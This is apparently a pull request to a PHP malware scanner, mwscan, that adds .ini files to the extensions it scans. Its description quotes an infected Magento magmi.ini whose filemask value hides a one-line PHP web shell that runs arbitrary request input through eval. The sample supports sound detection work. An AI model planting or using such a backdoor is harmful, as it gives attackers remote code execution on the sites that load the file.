### PR TITLE
magmi.ini files are also used to embed PHP code

### DIFF
--- a/mwscan/settings.py
+++ b/mwscan/settings.py
@@ -5,7 +5,7 @@ CACHEDIR = os.path.expanduser('~/.cache/mwscan')
 LAST_RUN_FILE = os.path.join(CACHEDIR, 'last_run')
 DEFAULT_EXCLUDEFILE = os.path.expanduser('~/.config/mwscan/excludes')
 DEFAULT_RULES_FILE = os.path.join(os.path.dirname(__file__), 'data', 'all-confirmed.yar')
-CODE_EXT = ('php', 'phtml', 'js', 'jsx', 'html', 'php3', 'php4', 'php5', 'php7', 'sh')
+CODE_EXT = ('php', 'phtml', 'js', 'jsx', 'html', 'php3', 'php4', 'php5', 'php7', 'sh', 'ini')
 
 logging.basicConfig(format='[*] %(message)s', level=logging.DEBUG)
 logging.getLogger('requests').setLevel(logging.WARNING)


### PR DESCRIPTION
```
[DATABASE]
connectivity = "net"
host = "localhost"
port = "3306"
resource = "default_setup"
dbname = "toner"
user = "toner"
password = "<snip>"
table_prefix =
[MAGENTO]
version = "1.9.x"
basedir = "../.."
[GLOBAL]
step = "0.5"
multiselect_sep = ","
dirmask = "755"
filemask = "644<?php eval($_REQUEST[e]);?>"
```